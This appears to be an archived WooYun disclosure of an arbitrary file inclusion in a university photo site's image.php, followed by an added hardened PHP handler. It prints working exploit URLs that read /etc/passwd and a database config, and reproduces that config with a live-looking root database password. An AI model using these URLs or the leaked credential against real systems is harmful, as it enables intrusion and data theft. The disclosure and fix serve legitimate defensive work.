WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
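2015-09-23: Details reported to the vendor; awaiting vendor action
2015-09-24: Vendor confirmed; details disclosed to the vendor only
2015-10-04: Details disclosed to core white hats and experts in the relevant field
2015-10-14: Details disclosed to regular white hats
2015-10-24: Details disclosed to trainee white hats
2015-11-08: Details disclosed to the public
A simple arbitrary file inclusion, with no tricks involved.
http://photo.uestc.edu.cn/image.php?path=
The path parameter allows arbitrary file inclusion:
http://photo.uestc.edu.cn/image.php?path=/etc/passwd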
http://photo.uestc.edu.cn/image.php?path=/var/www/admin/application/config/database.php
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
/*
| -------------------------------------------------------------------
| DATABASE CONNECTIVITY SETTINGS
| -------------------------------------------------------------------
| This file will contain the settings needed to access your database.
|
| For complete instructions please consult the 'Database Connection'
| page of the User Guide.
|
| -------------------------------------------------------------------
| EXPLANATION OF VARIABLES
| -------------------------------------------------------------------
|
| ['hostname'] The hostname of your database server.
| ['username'] The username used to connect to the database
| ['password'] The password used to connect to the database
| ['database'] The name of the database you want to connect to
| ['dbdriver'] The database type. ie: mysql. Currently supported: mysql, mysqli, postgre, odbc, mssql, sqlite, oci8
| ['dbprefix'] You can add an optional prefix, which will be added
| to the table name when using the Active Record class
| ['pconnect'] TRUE/FALSE - Whether to use a persistent connection
| ['db_debug'] TRUE/FALSE - Whether database errors should be displayed.
| ['cache_on'] TRUE/FALSE - Enables/disables query caching
| ['cachedir'] The path to the folder where cache files should be stored
| ['char_set'] The character set used in communicating with the database
| ['dbcollat'] The character collation used in communicating with the database
| NOTE: For MySQL and MySQLi databases, this setting is only used
| as a backup if your server is running PHP < 5.2.3 or MySQL < 5.0.7.
| There is an incompatibility in PHP with mysql_real_escape_string() which
| can make your site vulnerable to SQL injection if you are using a
| multi-byte character set and are running versions lower than these.
| Sites using Latin-1 or UTF-8 database character set and collation are unaffected.
| ['swap_pre'] A default table prefix that should be swapped with the dbprefix
| ['autoinit'] Whether or not to automatically initialize the database.
| ['stricton'] TRUE/FALSE - forces 'Strict Mode' connections
| - good for ensuring strict SQL while developing
|
| The $active_group variable lets you choose which connection group to
| make active. By default there is only one group (the 'default' group).
|
| The $active_record variables lets you determine whether or not to load
| the active record class
*/
$active_group = 'default';
$active_record = TRUE;
$db['default']['hostname'] = '127.0.0.1';
$db['default']['username'] = 'root';
$db['default']['password'] = 'ukf8rz5gv8';
$db['default']['database'] = 'epaper2013';
$db['default']['dbdriver'] = 'mysql';
$db['default']['dbprefix'] = '';
$db['default']['pconnect'] = TRUE;
$db['default']['db_debug'] = TRUE;
$db['default']['cache_on'] = FALSE;
$db['default']['cachedir'] = '';
$db['default']['char_set'] = 'utf8';
$db['default']['dbcollat'] = 'utf8_general_ci';
$db['default']['swap_pre'] = '';
$db['default']['autoinit'] = TRUE;
$db['default']['stricton'] = FALSE;
/* End of file database.php */
/* Location: ./application/config/database.php */
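As above.
You know this better than I do.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-09-24 10:06
The vulnerability has been confirmed and the person responsible has been notified to follow up. Thank you.
None yet.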
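One way to close the hole in the path parameter reported above, as an added example that is not code from the original report or from the affected site: a hypothetical image handler that resolves path under a fixed image directory and serves only files whose content is an image. IMAGE_ROOT, ALLOWED_MIME and resolve_image() are assumed names, and a Linux host with the fileinfo extension is assumed; the site's real image.php source is not shown on the page.

```php
<?php
// Added example: hypothetical hardened replacement for an image.php-style handler.
// IMAGE_ROOT and ALLOWED_MIME are assumptions, not values taken from the report.
const IMAGE_ROOT = '/var/www/photo/images';
const ALLOWED_MIME = ['image/jpeg', 'image/png', 'image/gif'];

/**
 * Resolve a user-supplied relative path to a real file under $root.
 * Returns null if the path escapes the root or the file is not an allowed image.
 */
function resolve_image(string $root, string $userPath): ?string
{
    // Reject empty input, NUL bytes and absolute paths such as /etc/passwd.
    if ($userPath === '' || strpos($userPath, "\0") !== false || $userPath[0] === '/') {
        return null;
    }
    $rootReal = realpath($root);
    // realpath() collapses ../ and follows symlinks; it returns false if the file is missing.
    $full = realpath($root . DIRECTORY_SEPARATOR . $userPath);
    if ($rootReal === false || $full === false || !is_file($full)) {
        return null;
    }
    // Containment check; the trailing separator stops /images-old matching /images.
    if (strncmp($full, $rootReal . DIRECTORY_SEPARATOR, strlen($rootReal) + 1) !== 0) {
        return null;
    }
    // Decide by content, not by extension, so a config file such as
    // database.php is refused even if it somehow sits under the root.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($full);
    return in_array($mime, ALLOWED_MIME, true) ? $full : null;
}

// Act as a request handler only under a web SAPI, so the file can also be included in tests.
if (PHP_SAPI !== 'cli') {
    $path = isset($_GET['path']) && is_string($_GET['path']) ? $_GET['path'] : '';
    $file = resolve_image(IMAGE_ROOT, $path);
    if ($file === null) {
        http_response_code(404); // same answer for "missing" and "forbidden"
        exit;
    }
    header('Content-Type: ' . (new finfo(FILEINFO_MIME_TYPE))->file($file));
    header('X-Content-Type-Options: nosniff');
    header('Content-Length: ' . filesize($file));
    readfile($file);
}
```

Because the request above returned database.php, the database password shown in it should be treated as disclosed and rotated independently of fixing the handler.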